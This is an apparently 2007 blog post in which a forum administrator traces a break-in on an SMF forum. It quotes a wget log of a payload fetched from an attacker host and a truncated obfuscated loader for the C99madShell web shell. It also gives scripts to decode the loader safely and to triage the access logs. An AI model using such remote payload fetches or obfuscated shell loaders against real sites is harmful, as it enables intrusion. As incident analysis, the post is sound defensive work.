All Your SMF Forums Have Been Hacked. Have a Nice Day.

Posted: 2007-09-29 08:52:58

There is nothing quite like innocently checking over your httpd logs, attempting to figure out why the ‘preview’ feature of your forum s/w has stopped working [stuck on ‘fetching preview…’], only to come up to this…

--09:57:23-- http://kotzilla.jino-net.ru/include.txt
=> `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]

0K .......... .......... .......... .......... ... 100% 69.60 KB/s

09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

For those that do not know, the above translates to using wget, or the equivalent, to download a script to your system, with all of it being done through Apache, usually from a simple URL designed to exploit a weakness in the given application.

My journey starts here.

Step 1.

find / -name include.txt

Nothing. Intruder must have deleted or renamed it.

Step 2.

Check http://kotzilla.jino-net.ru/include.txt for clues.

<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
$md5_pass = ""; //If no pass then hash
eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));
?>

Intruder must think this is clever. Once you decode and inflate the string, it returns…

eval(gzinflate(base64_decode('[another string to decode and inflate]')));

Step 3.

We do not want to execute any PHP code that is an unknown. The only option left is to write a PHP script to decode/inflate until we get at the center…

<?php
// Outermost layer, copied from include.txt (payload truncated here).
$string = "eval(gzinflate(base64_decode('HJ3HkqN...[removed]...f/79z/8A')));";
// Match one eval(gzinflate(base64_decode('...'))) wrapper and capture the encoded blob.
$pattern = '/^eval\(gzinflate\(base64_decode\(\'([^\']*)\'\)\)\);/';
$count = 0;
// Peel layers until the remaining text is no longer another eval() wrapper;
// gzinflate() and base64_decode() are used directly, so nothing is ever executed.
while (preg_match($pattern, trim($string), $matches)) {
    $count++;
    $string = gzinflate(base64_decode($matches[1]));
}
echo "Decoded/Inflated: $count\n";
echo "$string";
?>

Seems to be some type of a web php shell script called C99madShell.

Step 4.

We need to locate the downloaded script…

find / -name '*.php' | xargs grep 'eval(gzinflate(base64_decode('

/.../forums.devside.net/Themes/readme.php:eval(gzinflate(base64_decode('HJ3Hkq...

Not good!

Step 5.

Check logs.

grep 'readme.php' /.../forums.devside.net/access_log

Intruder was up to something no good.

149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
149.156.204.1 - - [27/Sep/2007:13:09:24 -0400] "POST /Themes/readme.php HTTP/1.1" 200 4980 "http://forums.devside.net/Themes/readme.php" "GoogleBotv2"
...

Final Analysis.

I’ve searched the logs, and I cannot locate anything helpful about the exploit. It does not seem to be an exploit in a URL; it may be POST related, or have something to do with the SMF theme function. I run no mods, use the default theme, and do not allow users to switch themes.

The latest SMF 1.1.4 changelog does not state anything about fixed exploits.

I know the IP of the intruder [I’m sure it is just a hijacked system], the user_id on the forum, and the mail account used for activation, but not much else.

resolveip 149.156.204.1
Host name of 149.156.204.1 is nzs.agh.edu.pl

149.156.204.1 - - [26/Sep/2007:09:52:58 -0400] "GET /index.php?action=activate;u=1992;code=136bd7eb0f HTTP/1.1" 200 3409 "http://www.qcsalabama.com/mail/src/ read_body.php?mailbox=INBOX&passed_id=685&startMessage=1" "Opera/9.21 (Windows NT 5.1; U; ru)"

Checking the forum account, I see this user has also logged in via another IP [and this might be where the exploit starts]…

83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"

resolveip 83.219.135.75
Host name of 83.219.135.75 is ppp135-75.tis-dialog.ru
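The log excerpts above were read by hand; here is an added example (mine, not from the original post) that automates the same three tells over an Apache combined-format access_log: direct hits on a .php file that is not the forum's normal entry point, one IP rotating user agents (Opera, then "GoogleBotv2"), and arrivals from a "powered by smf" search-engine query. The sample lines and documentation-range IPs are constructed, and KNOWN_ENTRYPOINTS is an assumption to adjust for your install.

```python
import re
from collections import defaultdict

# Apache combined log format, the same layout as the access_log excerpts in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Scripts the forum is expected to serve directly (assumption: extend for your install).
KNOWN_ENTRYPOINTS = {"/index.php"}

# Constructed sample lines modelled on the post's excerpts (documentation-range IPs).
SAMPLE_LOG = """\
192.0.2.10 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?q=%22powered+by+smf+1.1.3%22" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru) Firefox/2.0.0.7"
192.0.2.10 - - [26/Sep/2007:09:57:23 -0400] "POST //index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
198.51.100.7 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
198.51.100.7 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.example/Themes/readme.php" "Opera/9.21 (Windows NT 5.1; U; ru)"
198.51.100.7 - - [27/Sep/2007:13:08:03 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4366 "-" "GoogleBotv2"
203.0.113.5 - - [27/Sep/2007:14:00:00 -0400] "GET /index.php?board=1.0 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Yield one dict per well-formed combined-format line; skip anything else."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            yield m.groupdict()


def triage(lines):
    """Return per-IP findings: unexpected .php hits, user-agent rotation, search-dork arrivals."""
    hits = defaultdict(list)
    agents = defaultdict(set)
    dorks = set()
    for r in parse(lines):
        # Strip the query string and collapse doubled slashes ("//index.php") before matching.
        script = re.sub(r"/+", "/", r["path"].split("?", 1)[0])
        if script.endswith(".php") and script not in KNOWN_ENTRYPOINTS and r["status"] == "200":
            hits[r["ip"]].append((r["method"], script))
        agents[r["ip"]].add(r["ua"])
        if "powered+by+smf" in r["referer"].lower():
            dorks.add(r["ip"])
    return {
        "unexpected_php": dict(hits),
        "ua_rotation": {ip for ip, uas in agents.items() if len(uas) > 1},
        "search_dork_arrivals": dorks,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG.splitlines()).items():
        print(f"{key}: {value}")
```

Run it against a real access_log with `triage(open("access_log"))`; any IP that shows up in more than one finding deserves the same closer look the post gives its two addresses.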

I can understand phpBB getting rooted, I can understand WordPress being owned, but this is a first one for SMF.

And for anyone having odd issues with SMF [like getting stuck on ‘fetching preview…’]…

Smile. All your SMF forums have been hacked. Have a nice day.

Search ‘fetching preview’ on the SMF support forums. This hack/exploit might be going back years.